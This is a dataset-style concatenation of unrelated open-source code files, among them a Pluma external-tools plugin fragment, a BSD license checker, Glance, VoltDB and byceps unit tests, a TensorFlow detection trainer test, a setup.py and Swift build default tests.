capture.set_env(PLUMA_CURRENT_DOCUMENT_URI = uri,
PLUMA_CURRENT_DOCUMENT_NAME = name,
PLUMA_CURRENT_DOCUMENT_SCHEME = scheme)
if Pluma.utils_uri_has_file_scheme(uri):
path = gfile.get_path()
cwd = os.path.dirname(path)
capture.set_cwd(cwd)
capture.set_env(PLUMA_CURRENT_DOCUMENT_PATH = path,
PLUMA_CURRENT_DOCUMENT_DIR = cwd)
documents_uri = [doc.get_uri()
for doc in window.get_documents()
if doc.get_uri() is not None]
documents_path = [Gio.file_new_for_uri(uri).get_path()
for uri in documents_uri
if Pluma.utils_uri_has_file_scheme(uri)]
capture.set_env(PLUMA_DOCUMENTS_URI = ' '.join(document | s_uri),
PLUMA_DOCUMENTS_PATH = ' '.join(documents_path))
flags = capture.CAPTURE_BOTH
if not node.has_hash_bang():
flags |= capture.CAPTURE_NEEDS_SHELL
capture.set_flags(flags)
# Get input text
input_type = node.input
output_type = node.output
# Clear the panel
panel.clear()
if output_type == 'output-panel':
panel.show()
# Assign the error output to | the output panel
panel.set_process(capture)
if input_type != 'nothing' and view is not None:
if input_type == 'document':
start, end = document.get_bounds()
elif input_type == 'selection' or input_type == 'selection-document':
try:
start, end = document.get_selection_bounds()
except ValueError:
if input_type == 'selection-document':
start, end = document.get_bounds()
if output_type == 'replace-selection':
document.select_range(start, end)
else:
start = document.get_iter_at_mark(document.get_insert())
end = start.copy()
elif input_type == 'line':
start = document.get_iter_at_mark(document.get_insert())
end = start.copy()
if not start.starts_line():
start.set_line_offset(0)
if not end.ends_line():
end.forward_to_line_end()
elif input_type == 'word':
start = document.get_iter_at_mark(document.get_insert())
end = start.copy()
if not start.inside_word():
panel.write(_('You must be inside a word to run this command'),
panel.command_tag)
return
if not start.starts_word():
start.backward_word_start()
if not end.ends_word():
end.forward_word_end()
input_text = document.get_text(start, end, False)
capture.set_input(input_text)
# Assign the standard output to the chosen "file"
if output_type == 'new-document':
tab = window.create_tab(True)
view = tab.get_view()
document = tab.get_document()
pos = document.get_start_iter()
capture.connect('stdout-line', capture_stdout_line_document, document, pos)
document.begin_user_action()
view.set_editable(False)
view.set_cursor_visible(False)
elif output_type != 'output-panel' and output_type != 'nothing' and view is not None:
document.begin_user_action()
view.set_editable(False)
view.set_cursor_visible(False)
if output_type == 'insert':
pos = document.get_iter_at_mark(document.get_mark('insert'))
elif output_type == 'replace-selection':
document.delete_selection(False, False)
pos = document.get_iter_at_mark(document.get_mark('insert'))
elif output_type == 'replace-document':
document.set_text('')
pos = document.get_end_iter()
else:
pos = document.get_end_iter()
capture.connect('stdout-line', capture_stdout_line_document, document, pos)
elif output_type != 'nothing':
capture.connect('stdout-line', capture_stdout_line_panel, panel)
document.begin_user_action()
capture.connect('stderr-line', capture_stderr_line_panel, panel)
capture.connect('begin-execute', capture_begin_execute_panel, panel, view, node.name)
capture.connect('end-execute', capture_end_execute_panel, panel, view, output_type)
# Run the command
capture.execute()
if output_type != 'nothing':
document.end_user_action()
class MultipleDocumentsSaver:
def __init__(self, window, panel, docs, node):
self._window = window
self._panel = panel
self._node = node
self._error = False
self._counter = len(docs)
self._signal_ids = {}
self._counter = 0
signals = {}
for doc in docs:
signals[doc] = doc.connect('saving', self.on_document_saving)
Pluma.commands_save_document(window, doc)
do |
drmateo/ecto | test/compile/check_new_bsd_license.py | Python | bsd-3-clause | 2,820 | 0.003546 | #!/usr/bin/env python
import sys
bsd = '''
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the Willow Garage, Inc. nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
skip_check_tag = "Willow Garage BSD License not applicable"
nerrors = 0
import os
autofix = False
if "ECTO_LICENSE_AUTOFIX" in os.environ:
autofix = True
files = sys.argv[1:]
commentchars = { '.cpp' : '//',
'.hpp' : '//',
'.py' : '#',
'.cmake' : '#',
'.txt' : '#'
}
for filename in files:
txt = open(filename).read()
thiserror = False
result = filename + "..."
if skip_check_tag in txt:
result += "ok"
else:
for l in bsd.split('\n'):
if l not in txt:
result += "missing: " + l + "\n"
thiserror = True
if thiserror:
nerrors += 1
else:
res | ult += "ok"
if thiserror and autofix:
newf = open(filename, "w")
for k, v in commentchars.iteritems():
if filename.endswith(k):
cmt = v
if txt.startswith('#!'):
hashbang, rest = txt.split('\n', 1)
print >>newf, hashbang
else:
| rest = txt
print >>newf, cmt, bsd.replace('\n', '\n' + cmt + ' ')
print >>newf, rest
newf.close()
result += filename + "AUTOFIXED"
print result
sys.exit(nerrors)
|
rajalokan/glance | glance/tests/unit/common/scripts/test_scripts_utils.py | Python | apache-2.0 | 5,341 | 0 | # Copyright 2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from six.moves import urllib
from glance.common import exception
from glance.common.scripts import utils as script_utils
import glance.tests.utils as test_utils
class TestScriptsUtils(test_utils.BaseTestCase):
def setUp(self):
super(TestScriptsUtils, self).setUp()
def test_get_task(self):
task = mock.ANY
task_repo = mock.Mock(return_value=task)
task_id = mock.ANY
self.assertEqual(task, script_utils.get_task(task_repo, task_id))
def test_unpack_task_input(self):
task_input = {"import_from": "foo",
"import_from_format": "bar",
"image_properties": "baz"}
task = mock.Mock(task_input=task_input)
self.assertEqual(task_input,
script_utils.unpack_task_input(task))
def test_unpack_task_input_error(self):
task_input1 = {"import_from_format": "bar", "image_properties": "baz"}
task_input2 = {"import_from": "foo", "image_properties": "baz"}
task_input3 = {"import_from": "foo", "import_from_format": "bar"}
task1 = mock.Mock(task_input=task_input1)
task2 = mock.Mock(task_input=task_input2)
task3 = mock.Mock(task_input=task_input3)
self.assertRaises(exception.Invalid,
script_utils.unpack_task_input, task1)
self.assertRaises(exception.Invalid,
script_utils.unpack_task_input, task2)
self.assertRaises(exception.Invalid,
script_utils.unpack_task_input, task3)
def test_set_base_image_properties(self):
properties = {}
script_utils.set_base_image_properties(properties)
self.assertIn('disk_format', properties)
self.assertIn('container_format', properties)
self.assertEqual('qcow2', properties['disk_format'])
self.assertEqual('bare', properties['container_format'])
def test_set_base_image_properties_none(self):
properties = None
script_utils.set_base_image_properties(properties)
self.assertIsNone(properties)
def test_set_base_image_properties_not_empty(self):
properties = {'disk_format': 'vmdk', 'container_format': 'bare'}
script_utils.set_base_image_properties(properties)
self.assertIn('disk_format', properties)
self.assertIn('container_format', properties)
self.assertEqual('vmdk', properties.get('disk_format'))
self.assertEqual('bare', properties.get('container_format'))
def test_validate_location_http(self):
location = 'http://example.com'
self.assertEqual(location,
script_utils.validate_location_uri(location))
def test_validate_location_https(self):
location = 'https://example.com'
self.assertEqual(location,
| script_utils.validate_location_uri(locati | on))
def test_validate_location_none_error(self):
self.assertRaises(exception.BadStoreUri,
script_utils.validate_location_uri, '')
def test_validate_location_file_location_error(self):
self.assertRaises(exception.BadStoreUri,
script_utils.validate_location_uri, "file:///tmp")
self.assertRaises(exception.BadStoreUri,
script_utils.validate_location_uri,
"filesystem:///tmp")
def test_validate_location_unsupported_error(self):
location = 'swift'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'swift+http'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'swift+https'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'swift+config'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'vsphere'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'sheepdog://'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'rbd://'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
location = 'cinder://'
self.assertRaises(urllib.error.URLError,
script_utils.validate_location_uri, location)
|
AbdealiJK/file-metadata | file_metadata/video/ogv_file.py | Python | mit | 683 | 0 | # -*- coding: utf-8 -*-
from __future__ import (division, absolute_import, unicode_literals,
print_function)
from file_metadata.video.video_file import VideoFile
class OGVFile(VideoFile):
@classmethod
def create(cls, *args, **kwargs):
return cls(*args, **k | wargs)
def analyze_file_format(self):
"""
Simply add a metadata mentioning this is a valid OGV file. This is
useful because OGV cannot be simply detected by MimeType as it shares
the same mime with OGG.
:return: dict with the keys:
| - Composite:FileFormat - 'ogv'
"""
return {'Composite:FileFormat': 'ogv'}
|
ZeitOnline/zeit.newsletter | src/zeit/newsletter/browser/edit.py | Python | bsd-3-clause | 2,579 | 0 | from zeit.cms.i18n import MessageFactory as _
from zope.cachedescriptors.property import Lazy as cachedproperty
import os.path
import zeit.cms.browser.view
import zeit.cms.content.interfaces
import zeit.cms.interfaces
import zeit.content.image.interfaces
import zeit.content.video.interfaces
import zeit.edit.browser.form
import zeit.edit.browser.landing
import zeit.edit.browser.view
import zeit.newsletter.interfaces
import zope.formlib.form
class LandingZoneBase(zeit.edit.browser.landing.LandingZone):
uniqueId = zeit.edit.browser.view.Form('uniqueId')
block_type = 'teaser'
def initialize_block(self):
content = zeit.cms.interfaces.ICMSContent(self.uniqueId)
self.block.reference = content
class GroupLandingZone(LandingZoneBase):
"""Handler to drop objects to the body's landing zone."""
order = 0
class TeaserLandingZone(LandingZoneBase):
"""Handler to drop objects after other objects."""
order = 'after-context'
class Teaser(zeit.cms.browser.view.Base):
@cachedproperty
def metadata(self):
return zeit.cms.content.interfaces.ICommonMetadata(
self.context.reference, None)
@cachedproperty
def image(self):
# XXX copy&paste&tweak of zeit.content.cp.browser.blocks.teaser.Display
content = self.context.reference
if content is None:
return
if zeit.content.video.interfaces.IVideoContent.providedBy(content):
return | content.thumbnail
images = zeit.content.image.interfaces.IImages(content, None)
if images is None:
preview = zope.component.queryMultiAdapter(
(content, self.request), name='preview')
if preview:
| return self.url(preview)
return
if not images.image:
return
group = images.image
for name in group:
basename, ext = os.path.splitext(name)
if basename.endswith('148x84'):
image = group[name]
return self.url(image, '@@raw')
class Advertisement(zeit.cms.browser.view.Base):
@cachedproperty
def image(self):
if not self.context.image:
return
return self.url(self.context.image, '@@raw')
class GroupTitle(zeit.edit.browser.form.InlineForm):
legend = None
prefix = 'group'
undo_description = _('edit group title')
form_fields = zope.formlib.form.FormFields(
zeit.newsletter.interfaces.IGroup).select('title')
class Empty(object):
def render(self):
return u''
|
bw4sz/DeepMeerkat | training/Detection/object_detection/trainer_test.py | Python | gpl-3.0 | 6,550 | 0.00229 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.trainer."""
import tensorflow as tf
from google.protobuf import text_format
from object_detection import trainer
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import standard_fields as fields
from object_detection.protos import train_pb2
NUMBER_OF_CLASSES = 2
def get_input_function():
"""A function to get test in | puts. Returns an image with one box."""
image = tf.random_uniform([32, 32, 3], dtype=tf.float32)
class_label = tf.random_uniform(
[1], minval=0, maxval=NUMBER_OF_CLASSES, dtype=tf | .int32)
box_label = tf.random_uniform(
[1, 4], minval=0.4, maxval=0.6, dtype=tf.float32)
return {
fields.InputDataFields.image: image,
fields.InputDataFields.groundtruth_classes: class_label,
fields.InputDataFields.groundtruth_boxes: box_label
}
class FakeDetectionModel(model.DetectionModel):
"""A simple (and poor) DetectionModel for use in test."""
def __init__(self):
super(FakeDetectionModel, self).__init__(num_classes=NUMBER_OF_CLASSES)
self._classification_loss = losses.WeightedSigmoidClassificationLoss(
anchorwise_output=True)
self._localization_loss = losses.WeightedSmoothL1LocalizationLoss(
anchorwise_output=True)
def preprocess(self, inputs):
"""Input preprocessing, resizes images to 28x28.
Args:
inputs: a [batch, height_in, width_in, channels] float32 tensor
representing a batch of images with values between 0 and 255.0.
Returns:
preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.
"""
return tf.image.resize_images(inputs, [28, 28])
def predict(self, preprocessed_inputs):
"""Prediction tensors from inputs tensor.
Args:
preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.
Returns:
prediction_dict: a dictionary holding prediction tensors to be
passed to the Loss or Postprocess functions.
"""
flattened_inputs = tf.contrib.layers.flatten(preprocessed_inputs)
class_prediction = tf.contrib.layers.fully_connected(
flattened_inputs, self._num_classes)
box_prediction = tf.contrib.layers.fully_connected(flattened_inputs, 4)
return {
'class_predictions_with_background': tf.reshape(
class_prediction, [-1, 1, self._num_classes]),
'box_encodings': tf.reshape(box_prediction, [-1, 1, 4])
}
def postprocess(self, prediction_dict, **params):
"""Convert predicted output tensors to final detections. Unused.
Args:
prediction_dict: a dictionary holding prediction tensors.
**params: Additional keyword arguments for specific implementations of
DetectionModel.
Returns:
detections: a dictionary with empty fields.
"""
return {
'detection_boxes': None,
'detection_scores': None,
'detection_classes': None,
'num_detections': None
}
def loss(self, prediction_dict):
"""Compute scalar loss tensors with respect to provided groundtruth.
Calling this function requires that groundtruth tensors have been
provided via the provide_groundtruth function.
Args:
prediction_dict: a dictionary holding predicted tensors
Returns:
a dictionary mapping strings (loss names) to scalar tensors representing
loss values.
"""
batch_reg_targets = tf.stack(
self.groundtruth_lists(fields.BoxListFields.boxes))
batch_cls_targets = tf.stack(
self.groundtruth_lists(fields.BoxListFields.classes))
weights = tf.constant(
1.0, dtype=tf.float32,
shape=[len(self.groundtruth_lists(fields.BoxListFields.boxes)), 1])
location_losses = self._localization_loss(
prediction_dict['box_encodings'], batch_reg_targets,
weights=weights)
cls_losses = self._classification_loss(
prediction_dict['class_predictions_with_background'], batch_cls_targets,
weights=weights)
loss_dict = {
'localization_loss': tf.reduce_sum(location_losses),
'classification_loss': tf.reduce_sum(cls_losses),
}
return loss_dict
def restore_map(self, from_detection_checkpoint=True):
"""Returns a map of variables to load from a foreign checkpoint.
Args:
from_detection_checkpoint: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Returns:
A dict mapping variable names to variables.
"""
return {var.op.name: var for var in tf.global_variables()}
class TrainerTest(tf.test.TestCase):
def test_configure_trainer_and_train_two_steps(self):
train_config_text_proto = """
optimizer {
adam_optimizer {
learning_rate {
constant_learning_rate {
learning_rate: 0.01
}
}
}
}
data_augmentation_options {
random_adjust_brightness {
max_delta: 0.2
}
}
data_augmentation_options {
random_adjust_contrast {
min_delta: 0.7
max_delta: 1.1
}
}
num_steps: 2
"""
train_config = train_pb2.TrainConfig()
text_format.Merge(train_config_text_proto, train_config)
train_dir = self.get_temp_dir()
trainer.train(create_tensor_dict_fn=get_input_function,
create_model_fn=FakeDetectionModel,
train_config=train_config,
master='',
task=0,
num_clones=1,
worker_replicas=1,
clone_on_cpu=True,
ps_tasks=0,
worker_job_name='worker',
is_chief=True,
train_dir=train_dir)
if __name__ == '__main__':
tf.test.main()
|
paulmartel/voltdb | lib/python/vdm/tests/server/deployment_user_test.py | Python | agpl-3.0 | 12,365 | 0.003316 | # This file is part of VoltDB.
# Copyright (C) 2008-2016 VoltDB Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with VoltDB. If not, see <http://www.gnu.org/licenses/>.
import unittest
import requests
import socket
import xmlrunner
__host_name__ = socket.gethostname()
__host_or_ip__ = socket.gethostbyname(__host_name__)
__db_url__ = 'http://%s:8000/api/1.0/databases/' % \
__host_or_ip__
class DeploymentUser(unittest.TestCase):
"""
test case for database
"""
def setUp(self):
"""Create a deployment user"""
headers = {'Content-Type': 'application/json; charset=utf-8'}
db_data = {'name': 'testDB'}
response = requests.post(__db_url__, json=db_data, headers=headers)
self.assertEqual(response.status_code, 201)
response = requests.get(__db_url__)
value = response.json()
if value:
db_length = len(value['databases'])
last_db_id = value['databases'][db_length-1]['id']
db_data = {"name": "test", "password": "voltdb", "plaintext": True, "roles": "Administrator,Test", "databaseid": 1}
db_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(db_url, json=db_data, headers=headers)
self.assertEqual(response.status_code, 200)
def tearDown(self):
"""Delete a deployment user"""
response = requests.get(__db_url__)
value = response.json()
if value:
db_length = len(value['databases'])
last_db_id = value['databases'][db_length-1]['id']
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.get(user_url)
value = response.json()
if value:
user_length = len(value['deployment'])
last_user_id = value['deployment'][user_length-1]['userid']
user_delete_url = '%s%u/users/%u/' % (__db_url__, last_db_id, last_user_id)
response = requests.delete(user_delete_url)
self.assertEqual(response.status_code, 200)
db_url = __db_url__ + str(last_db_id)
response = requests.delete(db_url)
self.assertEqual(response.status_code, 204)
class UpdateDeploymentUser(DeploymentUser):
def test_validate_duplicate_username(self):
"""Validate duplicate username"""
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
db_data = {"name": "test", "password": "voltdb", "plaintext": True, "roles": "Admi | nistrator", "databaseid": 1}
response = requests.post(user_url, json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'], u'user name already exists')
self.assertE | qual(response.status_code, 404)
else:
print "The database list is empty"
def test_validate_username_empty(self):
"""ensure username value is not empty"""
db_data = {"password": "voltdb", "plaintext": True, "roles": "Administrator", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "'name' is a required property")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_invalid_username(self):
db_data = {"name":"@@@@", "password": "voltdb", "plaintext": True, "roles": "Administrator", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "u'@@@@' does not match '^[a-zA-Z0-9_.]+$'")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_password_empty(self):
"""ensure password value is not empty"""
db_data = {"name": "voltdb", "plaintext": True, "roles": "Administrator", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "'password' is a required property")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_roles_empty(self):
"""ensure roles value is not empty"""
db_data = {"name": "voltdb", "password": "test", "plaintext": True, "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "'roles' is a required property")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_validate_invalid_role(self):
db_data = {"name": "voltdb", "password": "test", "plaintext": True,"roles":"@@@@", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'][0], "u'@@@@' does not match '^[a-zA-Z0-9_.,-]+$'")
self.assertEqual(response.status_code, 200)
db_data = {"name": "voltdb", "password": "test", "plaintext": True,"roles":",", "databaseid": 1}
response = requests.post(user_url,
json=db_data, headers=headers)
value = response.json()
self.assertEqual(value['statusString'], "Invalid user roles.")
self.assertEqual(response.status_code, 200)
else:
print "The database list is empty"
def test_ensure_no_duplicate_role(self):
"""ensure no duplicate roles are inserted"""
db_data = {"name": "test", "password": "admin", "plaintext": True, "roles": "Test1,Test1", "databaseid": 1}
headers = {'Content-Type': 'application/json; charset=utf-8'}
last_db_id = GetLastDbId()
if last_db_id != -1:
user_url = '%s%u/users/' % (__db_url__, last_db_id)
response = requests.get(user_url)
value = response.json()
if value:
|
homeworkprod/byceps | tests/integration/blueprints/admin/orga_team/test_team_views.py | Python | bsd-3-clause | 4,119 | 0.000243 | """
:Copyright: 2006-2021 Jochen Kupperschmidt
:License: Revised BSD (see `LICENSE` file for details)
"""
from byceps.services.orga_team import service as orga_team_service
from byceps.services.party import service as party_service
from tests.helpers import create_party
def test_tea | ms_for_party(orga_team_admin_client, party):
url = f'/admin/orga_teams/teams/{party.id}'
response = orga_team_admin_client.get(url)
assert response.status_code == 200
def test_team_create_form(orga_team_admin_client, party):
url = f'/admin/orga_teams/teams/{party.i | d}/create'
response = orga_team_admin_client.get(url)
assert response.status_code == 200
def test_team_create_and_delete(orga_team_admin_client, party):
assert orga_team_service.count_teams_for_party(party.id) == 0
url = f'/admin/orga_teams/teams/{party.id}'
form_data = {'title': 'Support'}
response = orga_team_admin_client.post(url, data=form_data)
assert response.status_code == 302
assert orga_team_service.count_teams_for_party(party.id) == 1
teams = orga_team_service.get_teams_for_party(party.id)
assert len(teams) == 1
team = list(teams)[0]
url = f'/admin/orga_teams/teams/{team.id}'
response = orga_team_admin_client.delete(url)
assert response.status_code == 204
assert orga_team_service.find_team(team.id) is None
assert orga_team_service.count_teams_for_party(party.id) == 0
def test_teams_copy_form_with_target_party_teams(orga_team_admin_client, brand):
source_party = create_party(brand.id, party_id='source', title='Source')
target_party = create_party(brand.id, party_id='target', title='Target')
team = orga_team_service.create_team(target_party.id, 'Security')
url = f'/admin/orga_teams/teams/{target_party.id}/copy'
response = orga_team_admin_client.get(url)
assert response.status_code == 302
# Clean up.
orga_team_service.delete_team(team.id)
for party in source_party, target_party:
party_service.delete_party(party.id)
def test_teams_copy_form_without_source_teams(orga_team_admin_client, brand):
target_party = create_party(brand.id, party_id='target', title='Target')
url = f'/admin/orga_teams/teams/{target_party.id}/copy'
response = orga_team_admin_client.get(url)
assert response.status_code == 302
# Clean up.
party_service.delete_party(target_party.id)
def test_teams_copy_form_with_source_teams(orga_team_admin_client, brand):
source_party = create_party(brand.id, party_id='source', title='Source')
target_party = create_party(brand.id, party_id='target', title='Target')
team = orga_team_service.create_team(source_party.id, 'Tech')
url = f'/admin/orga_teams/teams/{target_party.id}/copy'
response = orga_team_admin_client.get(url)
assert response.status_code == 200
# Clean up.
orga_team_service.delete_team(team.id)
for party in source_party, target_party:
party_service.delete_party(party.id)
def test_teams_copy(orga_team_admin_client, brand):
source_party = create_party(brand.id, party_id='source', title='Source')
target_party = create_party(brand.id, party_id='target', title='Target')
team1 = orga_team_service.create_team(source_party.id, 'Support')
team2 = orga_team_service.create_team(source_party.id, 'Tech')
assert orga_team_service.count_teams_for_party(source_party.id) == 2
assert orga_team_service.count_teams_for_party(target_party.id) == 0
url = f'/admin/orga_teams/teams/{target_party.id}/copy'
form_data = {'party_id': source_party.id}
response = orga_team_admin_client.post(url, data=form_data)
assert response.status_code == 302
assert orga_team_service.count_teams_for_party(source_party.id) == 2
assert orga_team_service.count_teams_for_party(target_party.id) == 2
# Clean up.
new_teams = orga_team_service.get_teams_for_party(target_party.id)
for team in {team1, team2}.union(new_teams):
orga_team_service.delete_team(team.id)
for party in source_party, target_party:
party_service.delete_party(party.id)
|
smcmahon/beatbox | setup.py | Python | gpl-2.0 | 672 | 0.046131 |
from setuptools import set | up
setup(name='beatbox',
version='20.1', # be sure to update the version in _beatbox.py too
package_dir={'': 'src'},
packages=['beatbox'],
author = "Simon Fell et al",
author_email = 'plonesf@googlegroups.com',
description = "A Python library for querying/updating Saleforce.com data via SOAP API",
long_description = open('README.txt').re | ad() + "\n" + open('CHANGES.txt').read(),
license = "GNU GENERAL PUBLIC LICENSE Version 2",
keywords = "python salesforce salesforce.com",
url = "http://code.google.com/p/salesforce-beatbox/",
classifiers = ["Development Status :: 5 - Production/Stable"]
)
|
apple/swift | utils/build_swift/tests/build_swift/test_defaults.py | Python | apache-2.0 | 4,351 | 0 | # This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2020 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See https://swift.org/LICENSE.txt for license information
# See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
from __future__ import absolute_import, unicode_literals
import unittest
from build_swift import defaults
from build_swift import shell
from .. import utils
try:
# Python 3.3
from unittest import mock
from unittest.mock import patch, MagicMock
except ImportError:
mock = None
class MagicMock(object):
def __init__(self, *args, **kwargs):
pass
def patch(*args, **kwargs):
return lambda func: func
# ----------------------------------------------------------------------------
# Constants
_SYSCTL_HW_MEMSIZE = 17179869184
_SYSCTL_HW_MEMSIZE_OUTPUT = 'hw.memsize: {}'.format(_SYSCTL_HW_MEMSIZE)
# Safe upper bound to sanity check the LTO link job heuristics.
_LTO_LINK_JOBS_UPPER_BOUND = 100
# ----------------------------------------------------------------------------
class TestDefaults(unittest.TestCase):
"""Unit tests for the defaults module in build_swift.
"""
# ------------------------------------------------------------------------
# _system_memory
@utils.requires_module('unittest.mock')
@patch('platform.platform', MagicMock(return_value='Darwin'))
def test_system_memory_darwin_platform(self):
with mock.patch.object(shell, 'check_output') as mock_check_output:
mock_check_output.return_value = _SYSCTL_HW_MEMSIZE_OUTPUT
self.assertEqual(
defaults._system_memory(), _SYSCTL_HW_MEMSIZE)
@utils.requires_module('unittest.mock')
@patch('platform.platform', MagicMock(return_value='Darwin'))
def test_system_memory_darwin_platform_when_sysctl_fails(self):
with mock.patch.object(shell, 'check_output') as mock_check_output:
mock_check_output.side_effect = shell.CalledProcessError(
returncode=1,
cmd=['sysctl', 'hw.memsize'])
self.assertIsNone(defaults._system_memory())
@utils.requires_module('unittest.mock')
@patch('platform.platform', MagicMock(return_value='Linux'))
def test_system_memory_linux_platform(self):
self.assertIsNone(defaults._system_memory())
@utils.requires_module('unittest.mock')
@patch('platform.platform', MagicMock(return_value='Windows'))
def test_system_memory_windows_platform(self):
self.assertIsNone(defaults._system_memory())
# ------------------------------------------------------------------------
# _default_llvm_lto_link_jobs
@utils.requires_module('unittest.mock')
def test_default_llvm_lto_link_jobs(self):
with mock.patch.object(defaults, '_system_memory') as mock_memory:
mock_memory.return_value = _SYSCTL_HW_MEMSIZE
lto_link_jobs = defaults._default_llvm_lto_link_jobs()
self.assertIsNotNone(lto_link_jobs)
self.assertLess(lto_link_jobs, _LTO_LINK_JOBS_UPPER_BOUND)
@utils.requires_module('unittest.mock')
def test_default_llvm_lto_link_jobs_with_unknown_system_memory(self):
with mock.patch.object(defaults, '_system_memory') as mock_memory:
mock_memory.return_value = None
self.assertIsNone(defaults._default_llvm_lto_link_jobs())
# ------------------------------------------ | ------------------------------
# _default_swift_lto_link_jobs
@utils.requires_module('unittest.mock')
def test_default_swift_lto_link_jobs(self):
with mock.patch.object(defaults, '_system_memory') as mock_memory:
mock_memory.return_value = _SYSCTL_HW_MEMSIZE
lto_link_jobs = defaults._default_swift_lto_link_jobs()
self.assertIsNotNone(lto_link_jobs)
self.assertLess(lto_link_jobs, _LTO_LINK_JOBS_UPPER_BOUND)
| @utils.requires_module('unittest.mock')
def test_default_swift_lto_link_jobs_with_unknown_system_memory(self):
with mock.patch.object(defaults, '_system_memory') as mock_memory:
mock_memory.return_value = None
self.assertIsNone(defaults._default_llvm_lto_link_jobs())
|
